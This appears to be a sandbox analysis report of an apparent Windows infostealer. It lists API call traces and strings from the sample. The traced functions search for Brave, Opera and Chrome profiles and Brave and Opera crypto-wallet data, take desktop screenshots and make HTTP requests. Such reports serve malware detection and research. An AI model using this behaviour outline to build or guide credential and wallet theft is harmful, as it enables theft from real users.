GetProcAddress.KERNEL32 ref: 00416638
GetProcAddress.KERNEL32(752C0000), ref: 00416653
GetProcAddress.KERNEL32 ref: 0041666A
GetProcAddress.KERNEL32 ref: 00416681
GetProcAddress.KERNEL32 ref: 00416698
GetProcAddress.KERNEL32 ref: 004166AF
GetProcAddress.KERNEL32(74EC0000), ref: 004166CE
GetProcAddress.KERNEL32 ref: 004166E5
GetProcAddress.KERNEL32 ref: 004166FC
GetProcAddress.KERNEL32 ref: 00416713
GetProcAddress.KERNEL32 ref: 0041672A
GetProcAddress.KERNEL32 ref: 00416741
GetProcAddress.KERNEL32(75BD0000), ref: 00416760
GetProcAddress.KERNEL32 ref: 00416777
GetProcAddress.KERNEL32 ref: 0041678E
GetProcAddress.KERNEL32 ref: 004167A5
GetProcAddress.KERNEL32 ref: 004167BC
GetProcAddress.KERNEL32 ref: 004167D3
GetProcAddress.KERNEL32 ref: 004167EA
GetProcAddress.KERNEL32 ref: 00416801
GetProcAddress.KERNEL32 ref: 00416818
GetProcAddress.KERNEL32(75A70000), ref: 00416833
GetProcAddress.KERNEL32 ref: 0041684A
GetProcAddress.KERNEL32 ref: 00416861
GetProcAddress.KERNEL32 ref: 00416878
GetProcAddress.KERNEL32 ref: 0041688F
GetProcAddress.KERNEL32(75450000), ref: 004168AA
GetProcAddress.KERNEL32 ref: 004168C1
GetProcAddress.KERNEL32(75DA0000), ref: 004168DC
GetProcAddress.KERNEL32 ref: 004168F3
GetProcAddress.KERNEL32(6F2D0000), ref: 00416912
GetProcAddress.KERNEL32 ref: 00416929
GetProcAddress.KERNEL32 ref: 00416940
GetProcAddress.KERNEL32 ref: 00416957
GetProcAddress.KERNEL32 ref: 0041696E
GetProcAddress.KERNEL32 ref: 00416985
GetProcAddress.KERNEL32 ref: 0041699C
GetProcAddress.KERNEL32 ref: 004169B3
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004169C9
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004169DF
GetProcAddress.KERNEL32(75AF0000), ref: 004169FA
GetProcAddress.KERNEL32 ref: 00416A11
GetProcAddress.KERNEL32 ref: 00416A28
GetProcAddress.KERNEL32 ref: 00416A3F
GetProcAddress.KERNEL32(75D90000), ref: 00416A5A
GetProcAddress.KERNEL32(6E340000), ref: 00416A75
GetProcAddress.KERNEL32 ref: 00416A8C
GetProcAddress.KERNEL32 ref: 00416AA3
GetProcAddress.KERNEL32 ref: 00416ABA
GetProcAddress.KERNEL32(6CB30000,SymMatchString), ref: 00416AD4

Strings

SymMatchString, xrefs: 00416ACE
HttpQueryInfoA, xrefs: 004169B9
InternetSetOptionA, xrefs: 004169CF
dbghelp.dll, xrefs: 004164F7

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: 374768779ad9c1c57e1c16cf8ad7dc588652fe9c528a838a6daf341ebb71f208
Instruction ID: 3e6caa5aab8599317485c50970fdae4c6edc1eb62b0e69e57b0e8c70e6e37883
Opcode Fuzzy Hash: 374768779ad9c1c57e1c16cf8ad7dc588652fe9c528a838a6daf341ebb71f208
Instruction Fuzzy Hash: E142E875411600EFDB1A9FA0FE48A293FB7FB08B21B14742AF905D2270D7364866EF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413F80 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 275
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00413F85
wsprintfA.USER32 ref: 00413FAB
FindFirstFileA.KERNEL32(?,?), ref: 00413FC2
memset.MSVCRT ref: 00413FD9
memset.MSVCRT ref: 00413FE7
StrCmpCA.SHLWAPI(?,00424758), ref: 00414005
StrCmpCA.SHLWAPI(?,0042475C), ref: 0041401F
wsprintfA.USER32 ref: 00414043
StrCmpCA.SHLWAPI(?,0042446F), ref: 00414054
wsprintfA.USER32 ref: 0041407A
wsprintfA.USER32 ref: 0041408E
memset.MSVCRT ref: 004140A0
lstrcat.KERNEL32(?,?), ref: 004140B2
strtok_s.MSVCRT ref: 004140EB
memset.MSVCRT ref: 00414100
lstrcat.KERNEL32(?,?), ref: 00414115
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414138

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

wsprintfA.USER32 ref: 0041417A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004141C8
strtok_s.MSVCRT ref: 004141EE
FindNextFileA.KERNELBASE(000000FF,?), ref: 0041430B
FindClose.KERNEL32(000000FF), ref: 0041431C

Strings

%s\*.*, xrefs: 00413FA0
%s\%s, xrefs: 00414088
%s\%s\%s, xrefs: 0041416F
%s\%s, xrefs: 0041403D
%s\%s\%s, xrefs: 00414074

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wsprintf$memset$Find$FileH_prologlstrcatstrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: %s\%s$%s\%s$%s\%s\%s$%s\%s\%s$%s\*.*
API String ID: 3694881843-1801205404
Opcode ID: 50efc432152d7d96c3fd2f47375d8bd4fd9a4dfe07715fc836f126937251d746
Instruction ID: 55da94bd21c097ffa10f430634e9145b483ee7c040acaa7c4cc18feb4ec813ff
Opcode Fuzzy Hash: 50efc432152d7d96c3fd2f47375d8bd4fd9a4dfe07715fc836f126937251d746
Instruction Fuzzy Hash: F2A1917190011DABCF20EFA1DD49EDE7BBDEF48304F004066F919E2151EB399A998BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDAF Relevance: 44.6, APIs: 19, Strings: 6, Instructions: 871
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040BDB4

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

FindFirstFileA.KERNEL32(00000000,?,00423BAB,00423BAA,00000000,?,00423CEC,?,?,00423BA7,?,?,00000000), ref: 0040BE55
StrCmpCA.SHLWAPI(?,00423CF0,?,?,00000000), ref: 0040BEBC
StrCmpCA.SHLWAPI(?,00423CF4,?,?,00000000), ref: 0040BED6
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00423CF8,?,?,00423BAE,?,?,00000000), ref: 0040BF87

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

Brave, xrefs: 0040C179
B, xrefs: 0040C9B1
Opera GX, xrefs: 0040BF76
Preferences, xrefs: 0040C198
\BraveWallet\Preferences, xrefs: 0040C27B
Google Chrome, xrefs: 0040C6CF

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: B$Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3869166975-1712999469
Opcode ID: 05e6dafba26929ee16c79725a5096563e05900a8343b09271e68ade2a7b8e087
Instruction ID: 17cf665bec510dd10c8af1510a092d8f18dc0d4bbd26f40d745eae5778ab6a2c
Opcode Fuzzy Hash: 05e6dafba26929ee16c79725a5096563e05900a8343b09271e68ade2a7b8e087
Instruction Fuzzy Hash: 16828071900248EACF15EBB6C946BDD7FB8AF15308F1444AEE845732C2DB781B58CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00414CC7 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 163
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414CCC
wsprintfA.USER32 ref: 00414CEB
FindFirstFileA.KERNEL32(?,?), ref: 00414D02
StrCmpCA.SHLWAPI(?,00424818), ref: 00414D1F
StrCmpCA.SHLWAPI(?,0042481C), ref: 00414D39
wsprintfA.USER32 ref: 00414D5D
StrCmpCA.SHLWAPI(?,0042447E), ref: 00414D6E
wsprintfA.USER32 ref: 00414D8B
wsprintfA.USER32 ref: 00414D9F
PathMatchSpecA.SHLWAPI(?,?), ref: 00414DB2
lstrcat.KERNEL32(?,?), ref: 00414DDE
lstrcat.KERNEL32(?,00424834), ref: 00414DF0
lstrcat.KERNEL32(?,?), ref: 00414E00
lstrcat.KERNEL32(?,00424838), ref: 00414E12
lstrcat.KERNEL32(?,?), ref: 00414E26
FindNextFileA.KERNEL32(00000000,?), ref: 00414EF6
FindClose.KERNEL32(00000000), ref: 00414F05

Strings

%s\%s, xrefs: 00414D99
%s\%s, xrefs: 00414D57
%s\*, xrefs: 00414CE5

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstH_prologMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 1348259030-445461498
Opcode ID: 7d1bba5a567e4f85a4f71222bda9ed4701143631782d026f7ea14414dbee75f1
Instruction ID: 3b0fe21ec450e1e38f4dcee90ce410e2317bd6c9bf3c8481a708f75c4baa7dd8
Opcode Fuzzy Hash: 7d1bba5a567e4f85a4f71222bda9ed4701143631782d026f7ea14414dbee75f1
Instruction Fuzzy Hash: 96512871900218ABCF20EBA1EC49ADE7BBDFF08315F0084AAF515E2191EB3997558F95

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD7F Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FD84
memset.MSVCRT ref: 0040FDAA
GetDesktopWindow.USER32 ref: 0040FDE0
GetWindowRect.USER32(00000000,?), ref: 0040FDED
GetDC.USER32(00000000), ref: 0040FDF4
CreateCompatibleDC.GDI32(00000000), ref: 0040FDFE
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040FE0F
SelectObject.GDI32(00000000,00000000), ref: 0040FE1A
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040FE36
GlobalFix.KERNEL32(?), ref: 0040FE94
GlobalSize.KERNEL32(?), ref: 0040FEA0

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00404360: _EH_prolog.MSVCRT ref: 00404365
Part of subcall function 00404360: lstrlen.KERNEL32(00000000), ref: 004043D4
Part of subcall function 00404360: StrCmpCA.SHLWAPI(?,004239B7,004239B3,004239AB,004239A7,004239A6), ref: 00404457
Part of subcall function 00404360: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404477

SelectObject.GDI32(00000000,?), ref: 0040FF1A
DeleteObject.GDI32(?), ref: 0040FF35
DeleteObject.GDI32(00000000), ref: 0040FF3C
ReleaseDC.USER32(00000000,?), ref: 0040FF46
CloseWindow.USER32(00000000), ref: 0040FF4D

Strings

image/jpeg, xrefs: 0040FE56

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 3067874393-3785015651
Opcode ID: dcba5b109f9bd70c2729365cd2e83e713533885bd5fb782799216b498cb56c07
Instruction ID: 879ab77ffff3ff30e6c7b4e68793e16e3bc93eab0a963a82db49d73bd1d71507
Opcode Fuzzy Hash: dcba5b109f9bd70c2729365cd2e83e713533885bd5fb782799216b498cb56c07
Instruction Fuzzy Hash: 225127B2800109AFDF01EFE5ED499EEBFBAFF09354F10402AF901A2160D7355A159BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404165 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040416A

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041B1
RtlAllocateHeap.NTDLL(00000000), ref: 004041B8
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004041D7
StrCmpCA.SHLWAPI(?), ref: 004041EB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040420F
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404245
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404269
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404274
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404292
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004042EA
InternetCloseHandle.WININET(00000000), ref: 0040431C
InternetCloseHandle.WININET(?), ref: 00404325
InternetCloseHandle.WININET(?), ref: 0040432E

Strings

GET, xrefs: 0040423D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 1687531150-1805413626
Opcode ID: d3b4e2465853432a3083c444009e64989dd2031eb63236b22f5920166c39059c
Instruction ID: d7e372f959dd3e5caf44f256035fa2464378805655ddc5b1d5d1d0239f48c882
Opcode Fuzzy Hash: d3b4e2465853432a3083c444009e64989dd2031eb63236b22f5920166c39059c
Instruction Fuzzy Hash: 69517BB2900119AFDF10EFE4DD85AEFBBB9EB48704F00412AFA11B2190D7785E45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004145BC Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004145C1
wsprintfA.USER32 ref: 004145E4
FindFirstFileA.KERNEL32(?,?), ref: 004145FB
StrCmpCA.SHLWAPI(?,004247E8), ref: 0041461D
StrCmpCA.SHLWAPI(?,004247EC), ref: 00414637
lstrcat.KERNEL32(?,?), ref: 0041466C
lstrcat.KERNEL32(?), ref: 0041467F
lstrcat.KERNEL32(?,?), ref: 00414693
lstrcat.KERNEL32(?,?), ref: 004146A3
lstrcat.KERNEL32(?,004247F0), ref: 004146B5
lstrcat.KERNEL32(?,?), ref: 004146C9

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

FindNextFileA.KERNEL32(00000000,?), ref: 00414763
FindClose.KERNEL32(00000000), ref: 00414772

Strings

%s\%s, xrefs: 004145DE

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 2282932919-4073750446
Opcode ID: 01be6c28ac1b19b7c073bb7578a16f2c66a2c01bc7fe04de0b7306356903f4a3
Instruction ID: a228b40f5a8258b76ced91f53415c5fba0f54d3f940ba50f2d363ddb221343bf
Opcode Fuzzy Hash: 01be6c28ac1b19b7c073bb7578a16f2c66a2c01bc7fe04de0b7306356903f4a3
Instruction Fuzzy Hash: 99514AB2900118ABCF20EBA1ED49AEE777DBF49314F0004AAF515E2191E7389759CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409E01 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 628fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00409E06

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00423BDE,00000000,?,00000000), ref: 00409E85
StrCmpCA.SHLWAPI(?,00423E1C), ref: 00409EDF
StrCmpCA.SHLWAPI(?,00423E20), ref: 00409EF9
StrCmpCA.SHLWAPI(00000000,Opera,00423BEB,00423BEA,00423BE7,00423BE6,00423BE3,00423BE2,00423BDF), ref: 00409F8C
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 00409FA0
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 00409FB4

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

Opera GX, xrefs: 00409F92
7, xrefs: 0040A60F
Opera Crypto, xrefs: 00409FA6
\*.*, xrefs: 00409E3C
Opera, xrefs: 00409F7A

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
API String ID: 3869166975-536343317
Opcode ID: 905816fbe52db63812e793a7664f03e12c33f574c9ab0a675d8857fd4fc45b5f
Instruction ID: 4ee464abe0630bd3f6ef2111930aa846f06f59d421dc7013a9b3c8e3e60c6303
Opcode Fuzzy Hash: 905816fbe52db63812e793a7664f03e12c33f574c9ab0a675d8857fd4fc45b5f
Instruction Fuzzy Hash: 1942923190128CEACF05EBA6C955BDCBFB46F19308F5444AEE805732C2DB781B18CB66

Uniqueness

Uniqueness Score: -1.00%

Function 19834CF0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 461fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19834EE1

Strings

YHI;, xrefs: 19834CF3
winOpen, xrefs: 19835110
psow, xrefs: 198351F5
exclusive, xrefs: 19834E81
delayed %dms for lock/sharing conflict at line %d, xrefs: 19834FB5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
